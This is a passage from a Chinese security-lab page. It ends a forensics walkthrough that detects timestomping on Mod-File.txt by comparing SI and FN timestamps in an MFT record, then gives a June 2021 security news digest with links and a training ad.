0x0567DC00|GOOD|OK||88567|13|1|86832|1|Mod-File.txt|:\Users\DFIR\Desktop\Mod-File.txt|FILE|ALLOCATED|1|archive|archive|DOS+WIN32|0|2019-01-01 01:01:01.0000000|2019-01-01 01:01:01.0000000|2020-01-19 12:19:30.3933817|2019-01-01 01:01:01.0000000|0|2020-01-19 11:51:19.3290999|2020-01-19 11:51:25.8535572
上述项目对应的含义如下:
RecordOffset|Signature|IntegrityCheck|Style|HEADER_MFTREcordNumber|HEADER_SequenceNo|Header_HardLinkCount|FN_ParentReferenceNo|FN_ParentSequenceNo|FN_FileName|FilePath|HEADER_Flags|RecordActive|FileSizeBytes|SI_FilePermission|FN_Flags|FN_NameType|ADS|SI_CTime|SI_ATime|SI_MTime|SI_RTime|MSecTest|FN_C
在其文件日期修改日期和访问日期上都很不正常,都是2019-01-01 01:01:01.0000000,通过比较FN Info Creation date(FN_CTime)和Std Info Creation date(SI_CTime)发现两种时间不一致。(注:FN (FILE_NAME) ,SI (STANDARD_INFORMATION) );而$FN只能由内核级进程修改,攻击者想修改非常困难。
至此我们找出了被修改的文件是Mod-File.txt,文件的原始创建时间是19-01-2020 11:51:19
四、总结
攻击者利用的是Timestomp技术。Timestomp 是一种修改文件时间戳(修改,访问,创建和更改时间)的技术,通常用于模拟同一文件夹中的文件。该技术可以用在攻击者修改或创建的文件上,使得它们在取证调查人员或文件分析工具面前更加隐蔽。Timestomp 可以与文件名伪装(Masquerading)结合使用来隐藏恶意软件和工具。(https://attack.mitre.org/techniques/T1070/006/)
本文涉及相关实验:https://www.yijinglab.com/expc.do?ec=ECID9d6c0ca797abec2016100813263000001 (本实验主要介绍 Linux 环境下的磁盘取证和内存取证工具的使用包括 Ftkimage、xmount、Volatility等。)
网络安全日报 2021年06月18日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、在线零售商 Cosmolog Kozmetik 数十万客户数据泄露
https://securityaffairs.co/wordpress/119067/data-breach/cosmolog-kozmetik-data-breach.html
2、Ferocious Kitten APT利用伪装的Telegram和Psiphon部署RAT
https://securityaffairs.co/wordpress/119073/apt/ferocious-kitten-apt-campaign.html
3、UNC2465网络犯罪集团对摄像头厂商大华进行供应链攻击
https://securityaffairs.co/wordpress/119051/cyber-crime/unc2465-supply-chain-attack.html
4、Chrome修复被在野利用的零日漏洞
https://www.securityweek.com/google-confirms-sixth-zero-day-chrome-attack-2021
5、研究人员发现2G网络GPRS存在漏洞,流量或被窃听超过20年
https://www.securityweek.com/security-flaw-found-2g-mobile-data-encryption-standard
6、谷歌推出 SLSA 框架以加强供应链完整性
https://www.securityweek.com/google-intros-slsa-framework-enforce-supply-chain-integrity
7、研究人员披露了一种新的进程篡改攻击技术-Process Ghosting
https://thehackernews.com/2021/06/researchers-uncover-process-ghosting.html
8、针对中东政府的Molerats 黑客组织在消失两个月后卷土重来
https://thehackernews.com/2021/06/molerats-hackers-return-with-new.html
9、韩国HMM海运公司电子邮件系统遭网络攻击
https://theloadstar.com/hmm-suffers-security-breach-and-cyber-attack-on-its-email-systems/
10、攻击者邮寄伪造的Ledger设备窃取加密货币
https://www.bleepingcomputer.com/news/cryptocurrency/criminals-are-mailing-hacked-ledger-devices-to-steal-cryptocurrency/
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页
蚁景网安学院火热招生中,限时领取大额优惠券,快来抢购吧~
扫码咨询客服了解招生最新内容和活动

